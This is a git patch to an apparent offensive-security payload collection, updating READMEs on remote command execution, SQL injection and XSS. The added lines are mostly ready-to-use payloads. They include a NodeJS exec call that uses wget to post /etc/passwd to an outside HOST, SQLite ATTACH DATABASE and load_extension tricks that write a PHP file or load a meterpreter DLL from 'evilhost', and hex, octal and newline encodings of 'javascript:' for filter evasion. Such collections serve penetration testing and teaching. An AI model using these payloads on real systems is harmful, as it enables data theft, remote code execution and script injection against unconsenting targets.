From 2fa9683b8cceafdd340cfc842df8454d51b873e4 Mon Sep 17 00:00:00 2001
From: swisskyrepo
Date: Thu, 17 Nov 2016 10:50:34 +0700
Subject: [PATCH] Updated XSS,SQL,RCE

---
 Remote commands execution/README.md | 4 ++--
 SQL injection/README.md | 15 +++++++++++++++
 XSS injection/README.md | 14 ++++++++++++++
 3 files changed, 31 insertions(+), 2 deletions(-)

diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index 1e4efc3..0603090 100644
--- a/Remote commands execution/README.md
+++ b/Remote commands execution/README.md
@@ -3,7 +3,7 @@ Remote code execution is a security vulnerability that allows an attacker to exe
 ## Exploits
-Normal code execution
+Normal code execution, execute the command and voila :p
 ```
 cat /etc/passwd
 root:x:0:0:root:/root:/bin/bash
@@ -37,7 +37,7 @@ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 NodeJS Code execution
 ```
-require('child_process').exec('wget+--post-data+"x=$(cat+/etc/passwd)"+HOST')
+require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
 ```
 ## Thanks to
diff --git a/SQL injection/README.md b/SQL injection/README.md
index 0c87aa0..9b29418 100644
--- a/SQL injection/README.md
+++ b/SQL injection/README.md
@@ -101,6 +101,21 @@ PostgreSQL Error Based - Basic
 ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
 ```
+# SQLite
+Remote Command Execution using SQLite command - Attach Database
+```
+ATTACH DATABASE ‘/var/www/lol.php’ AS lol;
+CREATE TABLE lol.pwn (dataz text);
+INSERT INTO lol.pwn (dataz) VALUES (‘’);--
+```
+
+Remote Command Execution using SQLite command - Load_extension
+```
+UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
+```
+Note: By default this component is disabled
+
+
 # Other usefull payloads
 Polyglot injection (multicontext)
diff --git a/XSS injection/README.md b/XSS injection/README.md
index a752bf5..7cdd819 100644
--- a/XSS injection/README.md
+++ b/XSS injection/README.md
@@ -99,6 +99,20 @@ javascript:prompt(1)
 %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
 javascript:confirm(1)
+
+We can encode the "javacript:" in Hex/Octal
+\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
+\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
+\152\141\166\141\163\143\162\151\160\164\072alert(1)
+
+We can use a 'newline character'
+java%0ascript:alert(1) - LF (\n)
+java%09script:alert(1) - Horizontal tab (\t)
+java%0dscript:alert(1) - CR (\r)
+
+Using the escape character
+ \j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
+
 ```
 XSS with data: